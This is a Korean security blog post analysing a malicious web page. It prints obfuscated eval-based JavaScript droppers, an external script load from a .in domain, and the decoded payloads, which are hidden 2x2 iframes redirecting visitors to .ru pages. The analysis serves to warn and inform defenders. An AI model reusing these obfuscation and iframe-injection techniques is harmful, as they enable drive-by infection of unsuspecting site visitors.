* 악성 링크이니 조심하시기 바랍니다!
<html><head><script type="text/javascript">window.location="";
</script></head><body><!--c3284d--><script>s="";
try
{
q=document.createElement("p");
q.appendChild("123"+n);
}
catch(qw)
{
h=-016/7;
try
{
a=prototype&5;
}
catch(zxc)
{
e=window["e"+"va"+"l"];
n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
.96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.
444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.
[생략]
342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.
416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.
194.327.404.310.78.123.236.65.20"
.split(".");
if(window.document)for(i=6-2-1-2-1;
-161+i!=2-2;
i++)
{
k=i;
s=s+String.fromCharCode(n[k]/(i%(h*h)+2));
}
e(s);
}
}
</script><!--/c3284d-->
<!--d93065--> <script>try
{
q=document.createElement("p");
q.appendChild(q+"");
}
catch(qw)
{
h=-012/5;
try
{
bcsd=prototype-2;
}
catch(bawg)
{
ss=[];
f=(h)?("fromCharC"+"ode"):"";
e=window["e"+"val"];
n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,
456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,
162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,
[생략],
444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,
102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40];
if(window.document)for(i=6-2-1-2-1;
-160+i!=2-2;
i++)
{
k=i;
ss=ss+String[f](n[k]/(i%(h*h)+2-1));
}
e("if(1)"+ss);
}
}
</script><!--/d93065-->
<a href="">Click</a>
<!--start_qpi--><script src=http://mmm2011.ppcsoft.in/pizda.js></script><!--end_qpi-->
</body></html>
[복호화]
26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202
.96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297.
444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.
[생략].
342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.
416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.
194.327.404.310.78.123.236.65.20"
----------------------------------------------------------------------------------------
document.write('<iframe src="http://hecrery.ru/count11.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
========================================================================================
13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,
456,99,122,102,416,116,232,336,232,47,94,315,476,97,208,342,444,113,92,342,468,47,198,333,468,110,232,
162,184,112,208,336,136,32,220,291,436,101,122,102,336,119,210,348,464,101,228,102,128,115,198,342,444,
[생략],
444,34,64,291,432,105,206,330,244,34,198,303,440,116,202,342,136,32,208,303,420,103,208,348,244,34,100,
102,128,119,210,300,464,104,122,102,200,34,124,180,188,105,204,342,388,109,202,186,156,41,118,39,40
=======================================================================================
if(1)
document.write('<iframe src="http://iwahroq.ru/count6.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
count6.php, count11.php 페이지는 모두 죽어있는 상태이다 !
=========================
Server IP(s):
0.0.0.0
=========================
'security > 악성코드 유포' 카테고리의 다른 글
| 악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 ! (0) | 2012.06.30 |
|---|---|
| inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 ! (0) | 2012.06.29 |
| Hex 코드로 위장하여 악성 Iframe이 삽입된 http://www.jeonju1318.or.kr (0) | 2012.06.03 |
| 악성 스크립트 새로운 암호화 방식 ?? (5) | 2012.02.26 |
| http://ad.nsonmedia.com 내의 악성 스크립트 삽입 ! (0) | 2012.02.25 |